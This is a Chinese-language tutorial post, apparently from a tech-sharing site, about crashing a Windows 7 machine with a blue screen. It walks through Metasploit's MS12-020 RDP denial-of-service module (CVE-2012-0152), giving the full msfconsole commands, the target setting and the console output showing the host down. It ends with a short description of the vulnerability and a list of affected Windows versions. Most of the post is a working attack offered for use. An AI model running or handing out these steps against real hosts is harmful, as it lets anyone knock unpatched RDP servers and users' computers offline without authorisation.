admin 管理员组

文章数量: 887007

简介

今天玩点特别的,让windows7直接蓝屏重启

准备

  • 一台windows7虚拟机
  • metasploit
  • 注意两台电脑要在同一网段上

要求

windows7 必须允许远程桌面连接,就是允许别的电脑远程连接这台电脑

操作

首先两台电脑相互ping一下,看看是不是可以连通
然后打开metasploit
msfconsole
输入
search maxchannel
先查找一下这个模块,然后
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
查看一下配置参数

msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3389             yes       The target port (TCP)

设置目标ip
set RHOST 192.168.1.108
执行
exploit
输出

msf auxiliary(ms12_020_maxchannelids) > exploit

[*] 192.168.1.108:3389 - 192.168.1.108:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.1.108:3389 - 192.168.1.108:3389 - 210 bytes sent
[*] 192.168.1.108:3389 - 192.168.1.108:3389 - Checking RDP status...
[+] 192.168.1.108:3389 - 192.168.1.108:3389 seems down
[*] Auxiliary module execution completed
msf auxiliary(ms12_020_maxchannelids) >

效果

蓝屏,重启

原理

使用了 CVE-2012-0152 远程桌面协议RDP拒绝访问漏洞(MS12-020)

漏洞描述

BUGTRAQ ID: 52354 CVE ID: CVE-2012-0152 远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。 Windows在处理某些RDP报文时Terminal Server 存在错误,可被利用造成服务停止响应。

漏洞影响的系统版本

  • Microsoft Windows XP Professional
  • Microsoft Windows XP Home
  • Microsoft Windows Server 2003 Standard Edition
  • Microsoft Windows Server 2003 Enterprise Edition
  • Microsoft Windows Server 2003 Datacenter Edition
  • Microsoft Windows 7

本文标签: 一台 蓝屏 电脑

版权声明:本文标题:如何让一台windows7电脑直接蓝屏死机 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1731683474h1499293.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。